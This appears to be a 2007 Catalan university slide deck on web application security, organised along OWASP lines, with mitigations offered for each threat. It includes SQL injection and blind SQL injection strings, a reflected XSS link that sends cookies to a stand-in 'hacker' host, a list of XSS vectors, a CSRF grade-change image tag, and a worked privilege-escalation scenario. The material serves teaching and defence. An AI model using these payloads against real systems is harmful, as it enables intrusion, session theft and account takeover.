Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Seguridad en aplicaciones web

1,236 views

Published on

OWASP Best practices slides seguridad en aplicaciones web aplicado al LCFIB laboratoriao de calculo de la facultat de informatica de barcelona.

Published in: Technology
 • Be the first to comment

 • Be the first to like this

Seguridad en aplicaciones web

 1. 1. LCFIB- 2007 Seguretat en aplicacions web Jordi Planadecursach [email_address] Héctor Puente [email_address]
 2. 2. LCFIB- 2007 Parlarem de… Protocol HTTP Sistemes d’autenticació Cookies Vulnerabilitats més comuns Polítiques de control d’accés Tractament d’erros i logging
 3. 3. LCFIB- 2007 Parlarem de… Com protegir dades sensibles Polítiques de seguretat Testing de seguretat
 4. 4. LCFIB- 2007 Introducció Que tenen en comú la majoria d’aplicacions web?
 5. 5. LCFIB- 2007 Que tenen el port 80 obert (o el 443)
 6. 6. LCFIB- 2007 Atacant Servidor Web <ul><li>L’atacant envia una petició HTTP al servidor web </li></ul><ul><li>El codi del servidor web realitza operacions per les quals no està preparat. </li></ul><ul><li>Es retorna una resposta a l’atacant amb dades que pretenien ser segures. </li></ul><ul><li>Que passa amb els insiders ? </li></ul>
 7. 7. LCFIB- 2007 <ul><li>Bugs d’aplicació </li></ul><ul><li>VS </li></ul><ul><li>Bugs de plataforma </li></ul>
 8. 8. LCFIB- 2007 <ul><li>La majoria d’atacs es realitzen desde el navegador </li></ul><ul><li>Firefox plugins: </li></ul><ul><ul><li>LiveHTTP Headers </li></ul></ul><ul><ul><li>Tamperdata </li></ul></ul><ul><ul><li>Web Developer </li></ul></ul><ul><li>Web proxies: </li></ul><ul><ul><li>OWASP WebScarab </li></ul></ul><ul><ul><li>Achilles </li></ul></ul><ul><li>Escaners de vulnerabilitats: </li></ul><ul><ul><li>Nessus </li></ul></ul>Com es realitzen els atacs?
 9. 9. LCFIB- 2007 75% dels atacs estan destinats a la capa d’aplicació 2/3 aplicacions web són en major o menor mesura vulnerables
 10. 10. LCFIB- 2007 <ul><li>Mètodes: GET, POST, TRACE, etc… </li></ul><ul><li>Headers </li></ul><ul><ul><li>A l’estándar HTTP hi ha 47 headers diferents </li></ul></ul><ul><ul><li>Uns dels més usats són: Accept, User-Agent, Host, Referer, Set-Cookie </li></ul></ul><ul><li>Paràmetres </li></ul><ul><ul><li>Passats per URL (GET) </li></ul></ul><ul><ul><li>Per formularis (POST) </li></ul></ul><ul><ul><li>Personalitzats per l’aplicació (headers) </li></ul></ul>HTTP Hyper Text Transfer Protocol
 11. 11. LCFIB- 2007 GET http://www.fib.upc.edu/fib/buscar.html?lang=0&section=0& s=hola HTTP/1.0 Accept: */* Accept-Language: es Cookie: SSO_ID=Ba3U8owbH4z0Q/K12gU2Yw==; JSESSIONID=DCD16D163B38B02858E466A216FF7612.pim; Apache=147.83.58.208.1184685235517970 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727) Host: raco.fib.upc.es Connection: Keep-Alive
 12. 12. LCFIB- 2007 POST https://raco.fib.upc.es:443/cas/servlet/lcfib.login.CASLogin HTTP/1.0 Referer: http://www.fib.upc.edu/fib/buscar.html?lang=0&section=0 Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727) Host: raco.fib.upc.es Cache-Control: no-cache Cookie: CASTGC=TGT-4579-xzlCXcMfJzdZyMr5kKEQ0WmzM1ArOTuaXsp-50; JSESSIONID=AF2BCACA6BB144A4392EF4FA1B467605.pim; SSO_ID=Ba3U8owbH4z0Q/K12gU2Yw==; url_service=https%3A%2F%2Fraco.fib.upc.es%2Fservlet%2Flcfib.racons.Portal& username=usuari & password=contrassenya &x=0&y=0
 13. 13. LCFIB- 2007 Interceptant peticions HTTP Web Scarab
 14. 14. LCFIB- 2007 Mètodes d’autenticació Com identificar qui està fent peticions ?
 15. 15. LCFIB- 2007 <ul><li>Mètodes d’identificar qui està fent les peticions </li></ul><ul><ul><li>Amb alguna cosa que saps (contrassenya) </li></ul></ul><ul><ul><li>Alguna cosa que saps (token) </li></ul></ul><ul><ul><li>Alguna cosa que ets (mètodes biomètrics) </li></ul></ul><ul><ul><li>Una combinació dels anteriors </li></ul></ul>
 16. 16. LCFIB- 2007 <ul><li>Basic HTTP Authentication </li></ul><ul><ul><li>L’usuari envia una petició a una pàgina </li></ul></ul><ul><ul><li>El servidor respon amb un error 401 (unauthorized) i avisa que accepta http authentication </li></ul></ul><ul><ul><li>El navegador pregunta a l’usuari username i password, els codifica en base64 i els envia al servidor </li></ul></ul><ul><ul><li>El servidor valida els credencials i autoritza o no. </li></ul></ul><ul><ul><li>No hi ha forma de deslogejar-se </li></ul></ul><ul><ul><li>La contrassenya s’envia en text plà </li></ul></ul><ul><li>Digest HTTP Authentication </li></ul>
 17. 17. LCFIB- 2007 <ul><li>Autenticació basada en formularis </li></ul><ul><ul><li>Formulari amb POST </li></ul></ul><ul><ul><li>Es crea una cookie </li></ul></ul><ul><ul><li>Opció recomenada </li></ul></ul><ul><li>Tots els mètodes haurien d’anar acompanyats de SSL per tal de fer l’enviament de contrassenyes segur </li></ul>
 18. 18. LCFIB- 2007 <ul><li>Una vegada s’envien els credencials s’han de validar contra un backend </li></ul><ul><ul><li>Base de dades SQL </li></ul></ul><ul><ul><li>Directori LDAP </li></ul></ul><ul><ul><li>Arxius XML </li></ul></ul><ul><ul><li>/etc/passwd </li></ul></ul><ul><ul><li>Altres mètodes </li></ul></ul><ul><li>Tots els mètodes haurien d’anar acompanyats de SSL per tal de fer l’enviament de contrassenyes segur </li></ul>
 19. 19. LCFIB- 2007 <ul><li>Sniffing </li></ul><ul><ul><li>Connexió al mateix hub </li></ul></ul><ul><ul><li>Connexió al mateix switch (arpspoofing) </li></ul></ul><ul><ul><li>Xarxes wireless </li></ul></ul><ul><ul><li>Xarxes intermitges (ISP’s) </li></ul></ul><ul><ul><li>Accés al servidor de destí </li></ul></ul><ul><li>Man in the middle </li></ul><ul><li>Ingenieria social </li></ul><ul><li>Força bruta </li></ul>
 20. 20. LCFIB- 2007 <ul><li>Recomanacions (No ensenyar mai les contrassenyes) </li></ul><ul><ul><li>Minimitzar el nombre de llocs on l’usuari es pot autenticar </li></ul></ul><ul><ul><li>En aplicacions grans utilitzar mètodes d’autenticació centralizada, Single Sign On </li></ul></ul><ul><ul><li>En els formularis on s’escriuen passwords utilitzar ocultació ******** <input type=“password” … > </li></ul></ul><ul><ul><li>No guardar mai passwords dins el codi HTML generat (hiddens) </li></ul></ul><ul><ul><li>Utilitzar HTTPS </li></ul></ul><ul><ul><li>No manejar manualment tokens i identificadors sessions </li></ul></ul>
 21. 21. LCFIB- 2007 <ul><li>Recomanacions (Emmagatzament racional) </li></ul><ul><ul><li>Guardar contrassenyes encriptades (SHA-256 SHA-1024) </li></ul></ul><ul><ul><li>En cas de no poder guardar-les en un backend encriptat </li></ul></ul><ul><ul><li>Enviar les passwords únicament sobre HTTPS </li></ul></ul><ul><ul><li>Esborrar passwords de memoria (memory dumps) </li></ul></ul><ul><ul><li>Tenir en compte la memoria cache </li></ul></ul><ul><li>Utilitzar llibreries de seguretat de proveidors segurs </li></ul><ul><ul><li>JCE (Java) </li></ul></ul><ul><ul><li>System.Security.Cryptography (.NET) </li></ul></ul>
 22. 22. LCFIB- 2007 <ul><li>Seguretat de la contrassenya </li></ul><ul><ul><li>Definir un tamany mínim de les contrassenyes </li></ul></ul><ul><ul><li>Posar dates de caducitat en les contrassenyes </li></ul></ul><ul><ul><li>Forçar que l’usuari no utilitzi contrassenyes referents a les seves dades </li></ul></ul><ul><ul><li>No utilitzar contrassenyes amb paraules que apareixen al lloc web </li></ul></ul><ul><li>Potència d’una contrassenya </li></ul><ul><ul><li>R = Contrassenyes per segon (en remot 200, en local 10.000.000) </li></ul></ul><ul><ul><li>C = Nombre de caràcters de la contrassenya </li></ul></ul><ul><ul><li>S = Tamany de l’alfabet </li></ul></ul><ul><ul><ul><li>P = S^C / R Exemple: R = 200 C = 5 S = 36 </li></ul></ul></ul><ul><ul><ul><li> P = 84h </li></ul></ul></ul>
 23. 23. LCFIB- 2007 <ul><li>Recomanacions (Els errors no donen pistes) </li></ul><ul><ul><li>No diferenciar quan s’ha introduit malament usuari o password </li></ul></ul><ul><ul><li>Utilitzar el mateix missatge d’error per tot el que no sigui un login correcte </li></ul></ul><ul><li>Recomanacions (Bloqueix de comptes) </li></ul><ul><ul><li>No banejar mai l’usuari per ip </li></ul></ul><ul><ul><li>Bloquejar l’usuari després de 3 intents insatisfactoris </li></ul></ul><ul><ul><li>Desbloquejar l’usuari després de cert temps o manualment </li></ul></ul><ul><ul><li>Utilitzar captcha’s després de 3 intents </li></ul></ul>
 24. 24. LCFIB- 2007 <ul><li>Recuperació de la contrassenya </li></ul><ul><ul><li>Mai enviar la contrassenya anterior </li></ul></ul><ul><ul><li>Donar la possibilitat d’introduir una “pregunta secreta” </li></ul></ul><ul><ul><li>No deixar que la resposta a la rpegunta sigui més dèbil que la contrassenya </li></ul></ul><ul><li>Canvi de contrassenya </li></ul><ul><ul><li>Preguntar sempre la contrassenya anterior abans de fer el canvi </li></ul></ul><ul><ul><li>Demanar una reautenticació després del canvi de contrassenya </li></ul></ul>
 25. 25. LCFIB- 2007 <ul><li>Una bona gestió de les contrassenyes implica una aplicació segura? </li></ul>
 26. 26. LCFIB- 2007 Cookies
 27. 27. LCFIB- 2007 <ul><li>Que és una cookie? </li></ul><ul><li>S’haurien d’utilitzar només per identificar sessions </li></ul><ul><li>També s’utilitzen per tracking i balanceix </li></ul>Http Session … . 76C98A6F9A6987F9083 O7CAFO6FAB6O6BB55A 1AFD6786C876A087F6D Objecte Sessió Session ID
 28. 28. LCFIB- 2007 <ul><li>Cicle de vida d’una sessió </li></ul><ul><ul><li>Es visita per primer cop un lloc web (el servidor envia una cookie al client) </li></ul></ul><ul><ul><li>Autenticació (a la sessió s’indica que l’usuari ha estat autenticat) </li></ul></ul><ul><ul><li>La sessioó caduca per Idle o per un timeout absolut </li></ul></ul><ul><ul><li>Logout (borrat de la cookie i sortida del lloc web) </li></ul></ul><ul><ul><li>Reautenticació (generar un altre cookie) </li></ul></ul>No inventar-se un sistema de sessions propi Utilizar sistemes de sessions integrats amb la plataforma JSession, SessionID
 29. 29. LCFIB- 2007 <ul><li>Quanta gent fa un logout abans de tancar el navegador? </li></ul><ul><li>La majoria de cookies no tenen timeout </li></ul>
 30. 30. LCFIB- 2007 <ul><li>Amanaces: Session hijacking </li></ul><ul><ul><li>Endevinar la session id </li></ul></ul><ul><ul><ul><li>Força bruta (inprovable) </li></ul></ul></ul><ul><ul><ul><li>Tenir accés al codi font i deduir quina serà per el pròxim usuari </li></ul></ul></ul><ul><ul><li>Robar la session Id </li></ul></ul><ul><ul><ul><li>Cross site scripting (XSS) </li></ul></ul></ul><ul><ul><ul><li>Sniffing (no usar HTTPS) </li></ul></ul></ul><ul><ul><ul><li>URL-Rewriting, caches, logs, copy-paste, etc… </li></ul></ul></ul><ul><ul><ul><li>Fixar la session Id </li></ul></ul></ul>
 31. 31. LCFIB- 2007 <ul><li>Recomanacions en cas d’inventar-se un sistema de sessions </li></ul><ul><ul><li>La session Id no s’ha de poder endevinar </li></ul></ul><ul><ul><ul><li>Ha de ser suficientment llarga (20bytes) </li></ul></ul></ul><ul><ul><ul><li>Ha de ser suficientment aleatoria </li></ul></ul></ul><ul><ul><li>Ha de ser única per cada usuari loggejat </li></ul></ul><ul><li>És díficil mantenir aquestes propietats </li></ul><ul><ul><li>No és tants sols un idintificador aleatori </li></ul></ul><ul><ul><li>S’utilitzen algoritmes de disperssió </li></ul></ul><ul><ul><li>Hi ha contingut criptgràfic </li></ul></ul>
 32. 32. LCFIB- 2007 <ul><li>En resum, recomanacions geneals </li></ul><ul><ul><li>Donar un mecanisme de LogOut </li></ul></ul><ul><ul><li>Les sessions haurien de caducar </li></ul></ul><ul><ul><li>Invalidar la cookie anterior en un relogin. </li></ul></ul><ul><ul><li>No s’haurien de loggejar ni cachejar sessions </li></ul></ul><ul><ul><li>No posar la session Id a la url com a paràmtre GET </li></ul></ul><ul><ul><li>No inventar-se el sistema de sessions </li></ul></ul>
 33. 33. LCFIB- 2007 <ul><li>Una bona gestió de les sessions implica una aplicació segura? </li></ul>
 34. 34. LCFIB- 2007 Vulnerabilitats més usuals
 35. 35. LCFIB- 2007 <ul><ul><li>Validació de l’entrada </li></ul></ul><ul><ul><ul><li>SQL Injection </li></ul></ul></ul><ul><ul><ul><li>Blind SQL Injection </li></ul></ul></ul><ul><ul><ul><li>XPath/Command/Altres Injections </li></ul></ul></ul><ul><ul><ul><li>Buffers overflow </li></ul></ul></ul><ul><ul><li>Cross Site Scripting (XSS) </li></ul></ul><ul><ul><li>Cross Site Request Forgery (CSRF) </li></ul></ul><ul><ul><li>Remote file inclusion </li></ul></ul>
 36. 36. LCFIB- 2007 <ul><li>Adonar-se del contingut que es pot posar dins un formulari </li></ul><ul><li>Detectar si el contingut és realment l’esperat </li></ul>Validació de l’entrada
 37. 37. LCFIB- 2007 Atacant Servidor Web <ul><li>L’atacant envia una petició HTTP al servidor web </li></ul><ul><li>El codi del servidor web realitza operacions per les quals no està preparat. </li></ul><ul><li>Es retorna una resposta a l’atacant amb dades que pretenien ser segures. </li></ul>SQL Injection
 38. 38. LCFIB- 2007 <ul><li>SQL Injection </li></ul><ul><li>Són vulnerables aquelles aplicacions que tenen de backend una base de dades SQL </li></ul><form method=&quot;post&quot; action=&quot; http://www.diseney.com/login.php &quot;> <input name=“ username &quot; type=&quot;text&quot; id=&quot;tfUName&quot;> <input name=“ password &quot; type=&quot;password&quot; id=&quot;tfUPass&quot;> </form> String username = request.getParameter(“username”); String password = request.getParameter(“password”); String sql = “ SELECT * FROM USERNAME WHERE username=‘” + username + “’ and password=‘” + password + “’” ; ResultSet rs = smt.executeQuery(sql); If( rs.results() > 0) login = true; else login = false;
 39. 39. LCFIB- 2007 Username: admin Password: 1234 SQL generat: SELECT * FROM logins WHERE username=‘ admin ’ AND password=‘ 1234 ’ ; Username: admin Password: ‘ OR ‘’=‘ SQL generat: SELECT * FROM logins WHERE username=‘ admin ’ AND password=‘ ‘ OR ‘’=‘ ’ ; Username: admin Password: ’; DROP TABLE logins where ‘’=‘ SQL generat: SELECT * FROM logins WHERE username=‘ admin ’ AND password=‘ ’; drop table logins where ‘’=‘ ’ ; String sql = “ SELECT * FROM logins WHERE username=‘” + username + “’ AND password=‘” + password + “’” ;
 40. 40. LCFIB- 2007 <ul><li>Com s’evita la SQL injection? </li></ul><ul><li>És tan fàcil com escapar cometes </li></ul><ul><li>“  ” ‘  ’ </li></ul>
 41. 41. LCFIB- 2007 <ul><li>Blind SQL Injection </li></ul><ul><li>Tot hi escapar les cometes... </li></ul><form method=&quot;post&quot; action=&quot; http://www.diseney.com/login.php &quot;> <input name=“ username &quot; type=&quot;text&quot; id=&quot;tfUName&quot;> <input name=“ pin_code &quot; type=&quot;password&quot; id=&quot;tfUPass&quot;> </form> String username = request.getParameter(“username”); String pin_code = request.getParameter(“password”); String sql = “ SELECT * FROM USERNAME WHERE username=‘” + username + “’ and pin_code= ” + pin_code ; ResultSet rs = smt.executeQuery(sql); If( rs.results() > 0) login = true; else login = false;
 42. 42. LCFIB- 2007 Username: admin Password: 1 OR 1=1 SQL generat: SELECT * FROM logins WHERE username=‘ admin ’ AND pin_code= 1 OR 1=1 Altres vectors: 1 OR HAVING 1=1 Error, ‘cuenta_corriente’ is not on the group by clause 1 OR GROUP BY cuenta_corriente HAVING 1=1 Error, ‘dni’ is not on the group by clause 1 OR GROUP BY cuenta_corriente,dni HAVING 1=1 Error, ‘direccion’ is not on the group by clause 1 OR (SELECT cuenta_corriente FROM logins) = “1234 1000 6666 45256” 1 OR (SELECT cuenta_corriente FROM logins) > “5000 0000 0000 0000” 1 OR (SELECT substr(cuenta_corriente,1) FROM logins) = chr(1) String sql = “ SELECT * FROM logins WHERE username=‘” + username + “’ AND pin_code=” + pin_code ;
 43. 43. LCFIB- 2007 <ul><li>Com s’evita la BSQL injection? </li></ul><ul><li>És tan fàcil com validar els enters </li></ul>String pinString = request.getParameter(“pin_code”); try{ int pinCode = Integer.parseInt(pinString); }catch (NumericException ex){ System.out.println(“Hacker go away!”); }
 44. 44. LCFIB- 2007 Buffer Overflow #include <stdlib.h> #include <stdio.h> char* read_POST(){ char query_string[1024]; int query_size; query_size = atoi(getenv(“CONTENT_LENGTH”)); fread(query_string,query_size,1,stdin); return query_string; }
 45. 45. LCFIB- 2007 <ul><li>INPUT </li></ul><ul><li>Codi a executar (shellcode) </li></ul><ul><li>Acabar d’emplenar fins 1024 bytes </li></ul><ul><li>4 bytes qualsevols </li></ul><ul><li>Adreça de retorn que ha de conicidir amb l’inici del buffer </li></ul>
 46. 46. LCFIB- 2007
 47. 47. LCFIB- 2007 Buffer Overflow #include <stdlib.h> #include <stdio.h> char* read_POST(){ char query_string[1024]; int query_size; query_size = atoi(getenv(“CONTENT_LENGTH”)); fread(query_string,query_size,1,stdin); return query_string; }
 48. 48. LCFIB- 2007 Solució: comprovar tamany de l’entrada #include <stdlib.h> #include <stdio.h> char* read_POST(){ char query_string[1024]; int query_size; query_size = atoi(getenv(“CONTENT_LENGTH”)); fread(query_string, min(query_size,1024) ,1,stdin); return query_string; }
 49. 49. LCFIB- 2007 <ul><li>Depenent del backend que s’utilitza </li></ul><ul><li>Validar que l’entrada no pugui ser interpetada com a codi del llenguatge per communicar-se amb el backend </li></ul><ul><li>XPath injection (Base de dades Exist, arxius XML) </li></ul><ul><li>Command injection </li></ul>Altres injections String consulta = “user[name/text()=‘” + usuari + ”' and password/text()=‘” + password + ”']/account/text())” XmlReader.query(consulta);
 50. 50. LCFIB- 2007 <ul><li>És una vulnerabilitat que permet executar scripts al exploador de la víctima </li></ul><ul><li>Perquè XSS? </li></ul><ul><li>Són vulnerables els navegadors que utilitzen Javascript (la majoria) o VBScript (internet explorer). </li></ul><ul><li>Es poden posar scripts malignes en pàgines web </li></ul>Cross Site Scripting (XSS) <ul><li>Conseqüències </li></ul><ul><ul><li>Moltes vegades aquest script el que fan és robar cookies </li></ul></ul><ul><ul><li>Es poden “desfassar” webs </li></ul></ul><ul><ul><li>Si l’explorador té un bug del sandbox estas perdut </li></ul></ul>
 51. 51. LCFIB- 2007 <ul><li>L’atacant troba un lloc web on poder posar JavaScript </li></ul><ul><li>L’atacant posa un script maligne </li></ul><ul><li>Qualsevol persona que visiti aquest lloc web estarà executant aquest script </li></ul><ul><li>L’script pot enviar la cookie a la pàgina de l’atacant i aquest pot realitzar un atac de suplantació d’identitat. </li></ul><ul><li>Si l’explorador té un bug del sandbox l’script pot navegar a altres llocs webs i robar dades confidencials, adreces de correu (gmail), contes bancaris (bancs), sessions, etc. </li></ul><ul><li>Si l’explorador corre en permisos d’administració es poden arribar a crear arxius a disc i executa codi arbritari. </li></ul>Stored XSS
 52. 52. LCFIB- 2007 <ul><li>L’atacant no pot posar directament javascript </li></ul><ul><li>Aquest troba un camp a un formulari on el s’introdueix apareix directament per pantalla (exemple: buscador) </li></ul><ul><li>L’atacant genera un link malicios per tal de que quan es cliqui s’executi aquest script </li></ul><ul><li>http://www.disney.com/buscador.jsp?s=<script>document.url=“http://hacker/pagina.php”+document.cookie;</script > </li></ul><ul><li>Quan es clica el link l’usuari veu per pantalla el que ha buscat, que en aquest cas és: <script>document.url=“http://hacker/pagina.php”+document.cookie;</script > </li></ul><ul><li>S’envia la cookie a la pàgina de l’atacant </li></ul><ul><li>Els atacs XSS es tornen molt més perillosos si s’utilitza AJAX perque es poden tenir peticions obertes invisibles. </li></ul>Reflected XSS
 53. 53. LCFIB- 2007 <ul><li>Com s’eviten els atacs XSS? </li></ul><ul><li>S’anula completament el “Rich Text” </li></ul><ul><li>o </li></ul><ul><li>Es posa un ciri al monestir de Montserrat </li></ul>
 54. 54. LCFIB- 2007 <ul><li>Vectors XSS </li></ul><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC=&quot;javascript:alert('XSS');&quot;> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 55. 55. LCFIB- 2007 <ul><li>Vectors XSS </li></ul><BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert(&quot;XSS&quot;)> <<SCRIPT>alert(&quot;XSS&quot;);//<</SCRIPT> <iframe src=http://ha.ckers.org/scriptlet.html < &quot;;alert('XSS');// <INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert('XSS');&quot;> <BODY BACKGROUND=&quot;javascript:alert('XSS')&quot;>
 56. 56. LCFIB- 2007 <ul><li>Evitar XSS </li></ul><ul><li>Cada dia en surten de nous </li></ul><ul><li>Són molt difícils de detectar </li></ul><ul><li>No hi ha cap llibreria que els detecti </li></ul><ul><li>Es poden evitar utilitzan application firewalls </li></ul><ul><li>Pàgina web de referència: http://ha.ckers.org/xss.html </li></ul><ul><li>Codificant l’entrada amb entitats HTML s’evita, es perd el “rich text” </li></ul><ul><li>S’han de seguir polítiques molt estrictes </li></ul><ul><li>Utilizant wrappers (llenguatges intermitjos) s’eviten </li></ul>
 57. 57. LCFIB- 2007 Cross Site Reference Forgery (CSRF) <ul><li>Bàsicament consisteix en aconseguir que l’explorador de la víctima visiti URL arbitràries. </li></ul><ul><li>Es com si l’atacant t’agafa el ratolí i et fa clicar allà on vol </li></ul><ul><li>Permet realitzar operacions complexes (logejarte en un banc i fer una tranferència) </li></ul><ul><li>Consisteix en posar les url’s que es vol que la victima visiti dins d’un tag <img> </li></ul><ul><li>Exemple: Enviem un mail al webmaster del raco amb la següent imatge <img src=“http://raco.fib.upc.edu/posar-notes.jsp?user=hacker&asig=TC&nota=10”> </li></ul>
 58. 58. LCFIB- 2007 <ul><li>Com s’eviten els atacs CSRF? </li></ul><ul><li>Deixant d’utilitzar el correu electrònic. </li></ul><ul><li>Molts lectors de mails pregunten abans de carregar imatges. </li></ul>
 59. 59. LCFIB- 2007 <ul><li>Evitar CSRF </li></ul><ul><li>Passant paràmetres per POST </li></ul><ul><li>Les operacions sensibles s’han de fer en diversos passos </li></ul><ul><li>No obrint imatges de correus electrònics de persones en que no es confia </li></ul><ul><li>La combinació de XSS + CSRF només té una forma d’evitar-se </li></ul><ul><li>Abans de realitzar operacions sensibles (notes, transferències bancaries) posar sistemes anti-robots: captcha, preguntes, operacions matemàtiques </li></ul>
 60. 60. LCFIB- 2007 Controls d’accés Que pot fer i no pot fer un usuari? <ul><li>Limitar accés </li></ul><ul><ul><li>Usuaris no autenticats (públic i privat) </li></ul></ul><ul><ul><li>Identificació d’usuaris (qui, que veuen, que poden fer) </li></ul></ul><ul><ul><li>Mes complicat del que sembla </li></ul></ul>
 61. 61. LCFIB- 2007 <ul><li>On es fa el control </li></ul><ul><ul><li>Entorn (servidor, filtre) </li></ul></ul><ul><ul><ul><li>Canvi de urls /usuari/a0000000/ </li></ul></ul></ul><ul><ul><li>Controlador (a quina lògica de negoci crida) </li></ul></ul><ul><ul><li>Lògica de negoci (a quina funció es crida) </li></ul></ul><ul><ul><li>Capa de dades (quines dades es mostren) </li></ul></ul><ul><ul><li>Capa de presentació (quins botons es mostren) </li></ul></ul>
 62. 62. LCFIB- 2007 <ul><li>Definir les regles </li></ul><ul><ul><li>Decidir i escriure funcions i dades a protegir </li></ul></ul><ul><ul><ul><li>Extreure regles d’accés </li></ul></ul></ul><ul><ul><li>Desenvolupar una matriu d’accés </li></ul></ul><ul><ul><li>Definir quina capa implementarà cada regla </li></ul></ul>
 63. 63. LCFIB- 2007 <ul><li>Capa de presentació </li></ul><ul><ul><li>Quins botons pot veure l’usuari i a on se li permet accedir </li></ul></ul><ul><ul><li>Decideix quina pàgina mostrar </li></ul></ul><ul><li>Com saltar-s’ho: </li></ul><ul><ul><li>Capa de presentació no limita que pot fer l’usuari </li></ul></ul><ul><ul><li>Manipular les URL directament </li></ul></ul><ul><ul><li>Guardar l’HTML, canviar-ho i enviar-ho al servidor </li></ul></ul><ul><ul><li>Utilitzar proxy per alterar contingut </li></ul></ul>
 64. 64. LCFIB- 2007 <ul><li>Entorn </li></ul><ul><ul><li>Protecció de contingut estàtic - Servidor web </li></ul></ul><ul><ul><li>Protecció de contingut dinàmic - Servidor d’aplicacions </li></ul></ul><ul><ul><li>Filtres de seguretat </li></ul></ul><ul><li>Bones pràctiques </li></ul><ul><ul><li>Limitar extensions utilitzades </li></ul></ul><ul><ul><li>Limitar accés a contingut estàtic/dinàmic </li></ul></ul><ul><ul><li>Verificar rutes accessibles en la aplicació </li></ul></ul>
 65. 65. LCFIB- 2007 <ul><li>Capa de negoci </li></ul><ul><ul><li>Quines funcions pot executar l’usuari </li></ul></ul><ul><ul><li>Decideix quines funcions s’han d’executar </li></ul></ul><ul><li>Com saltar-s’ho: </li></ul><ul><ul><li>Redirigint la petició al mateixa funció i pintar en funció de l’origen </li></ul></ul>
 66. 66. LCFIB- 2007 <ul><li>Capa de dades </li></ul><ul><ul><li>Quines dades por veure l’usuari </li></ul></ul><ul><ul><li>Decideix quines consultes es poden executar sobre les dades </li></ul></ul><ul><ul><ul><li>Limitar les consultes segons politiques de seguretat. </li></ul></ul></ul><ul><li>Com saltar-s’ho: </li></ul><ul><ul><li>El problema de les referències d’objectes </li></ul></ul><ul><ul><ul><li>Ids de productes, contes bancàries </li></ul></ul></ul>
 67. 67. LCFIB- 2007 <ul><li>Administració </li></ul><ul><ul><li>Funcions de superusuari </li></ul></ul><ul><ul><li>Funcions de manteniment </li></ul></ul><ul><li>Bones pràctiques: </li></ul><ul><ul><li>Separar aplicació per superusuari i aplicació per usuaris normals físicament. </li></ul></ul><ul><ul><ul><li>Diferent entorn </li></ul></ul></ul><ul><ul><ul><li>Limitat accés (VPN, IPs MACs) </li></ul></ul></ul>
 68. 68. LCFIB- 2007 Errors d’autenticació Que pot indicar un error <ul><li>Pèrdua de servei </li></ul><ul><li>Atac en progrés </li></ul><ul><li>Afectar a la seguretat </li></ul>
 69. 69. LCFIB- 2007 <ul><li>Tractament d’errors </li></ul><ul><ul><li>Totes les aplicacions generen errors </li></ul></ul><ul><ul><ul><li>Tractar TOTS els errors </li></ul></ul></ul><ul><ul><ul><li>No permetre que un error afecti al servidor </li></ul></ul></ul><ul><ul><li>Capturar tots els errors al codi (blocs try-catch) </li></ul></ul><ul><ul><ul><li>Registrar l’error a alguna banda </li></ul></ul></ul><ul><ul><ul><li>Determinar quina informació mostrar a l’usuari </li></ul></ul></ul><ul><ul><ul><ul><li>Missatge genèric, missatge específic, resultats parcials </li></ul></ul></ul></ul><ul><li>Bones pràctiques: </li></ul><ul><ul><li>Els errors mai han de revelar informació de la implementació </li></ul></ul><ul><ul><ul><li>Stacktraces, detalls de l’error </li></ul></ul></ul>
 70. 70. LCFIB- 2007 <ul><li>Questions importants </li></ul><ul><ul><li>Es important detectat atacs en progrés? </li></ul></ul><ul><ul><li>Hi ha formes de detectar atacs en progrés? </li></ul></ul><ul><ul><li>Quines politiques es segueixen per detectar atacs? Events, Límits </li></ul></ul><ul><ul><li>Analitzar els errors </li></ul></ul><ul><ul><ul><li>Com respondre a condicions d’errors </li></ul></ul></ul><ul><ul><li>Els logs han de permetre identificar situacions no controlades </li></ul></ul><ul><ul><ul><li>Capturar suficient informació </li></ul></ul></ul><ul><ul><ul><li>S’ha de poder separar informació de debug i de control </li></ul></ul></ul>
 71. 71. LCFIB- 2007 Exemple pràctic amb e-Catalunya
 72. 72. LCFIB- 2007 Objectiu <ul><li>Sense tenir privilegis crear un usuari amb permisos d’administració </li></ul>Procediment <ul><li>Esbrinar URL de creació d’usuari i canvi de privilègis </li></ul><ul><li>Creació d’un script que cridi aquestes URL </li></ul><ul><li>Adjuntar l’script en una eina </li></ul><ul><li>Fer que un administrador executi aquest script </li></ul>En la última versió: Modificació per tal de no poder incluir script a les eines Problemàtica: Dificultat de detectar la inclusió d’un script
 73. 73. LCFIB- 2007
 74. 74. LCFIB- 2007 Hacker Obtenció d’URL d’administració CREAR NOU USUARI + Esbrinar la URL de la pàgina de crear un nou usuari + Esbrinar el nom dels camps del formulari (nom, id, email) + Construir URL tal que si s’accedeix a ella es dona d’alta l’usuari especificat ASSIGNAR PERMISOS D’ADMINISTRACIÓ + Idem que l’anterior però usant la pàgina d’assignar permisos Obtenir URL
 75. 75. LCFIB- 2007 Hacker <script> … crear_usuari(X) fer_administrador(X) … </script> Creació de Script maligne SCRIPT + Cridar URL1 (crear nou usuari) + Cridar URL2 (assigna al nou usuari permisos d’administrador) (si s’utilitzen peticions AJAX l’usuari no se n’adona de que ha executat un script)
 76. 76. LCFIB- 2007 Hacker Introduir script maligne com a comentari a l’e-blog <script> … crear_usuari(X) administrador(X) … </script> Introduir SCRIPT a l’e-Blog
 77. 77. LCFIB- 2007 Hacker Ingenieria social Administrador Enviar un mail a l’admin amb l’enllaç al blog Quan l’administrador vagi a veure el Blog, si aquest està identificat, s’executarà l’script insertat. Aquest crearà un nou usuari amb permisos d’administrador que el hacker podrà utilitzar per fer maldats. També es podria robar la cookie de l’admin per tal de fer una suplantació d’identitat.
 78. 78. LCFIB- 2007

×